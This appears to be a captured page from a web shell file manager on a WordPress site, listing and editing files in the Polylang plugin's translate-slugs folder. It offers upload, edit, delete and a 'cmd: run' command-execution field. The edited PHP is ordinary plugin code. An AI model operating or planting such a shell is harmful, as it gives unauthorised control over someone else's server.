/
home
/
techb158
/
l2hypotheques.com
/
wp-content
/
plugins
/
polylang
/
src
/
modules
/
translate-slugs
/
/home/techb158/l2hypotheques.com/wp-content/plugins/polylang/src/modules/translate-slugs
mkdir
upload
Name
Size
Mode
Actions
load.php
351
0644
edit
dl
rm
settings-preview-translate-slugs.php
1239
0644
edit
dl
rm
Edit:
/home/techb158/l2hypotheques.com/wp-content/plugins/polylang/src/modules/translate-slugs/load.php
(351B)
<?php /** * Loads the settings module for translated slugs. * * @package Polylang */ if ( ! defined( 'ABSPATH' ) ) { exit; // Don't access directly } if ( $polylang->model->has_languages() ) { add_filter( 'pll_settings_modules', function ( $modules ) { $modules[] = 'PLL_Settings_Preview_Translate_Slugs'; return $modules; } ); }
Save
cmd:
run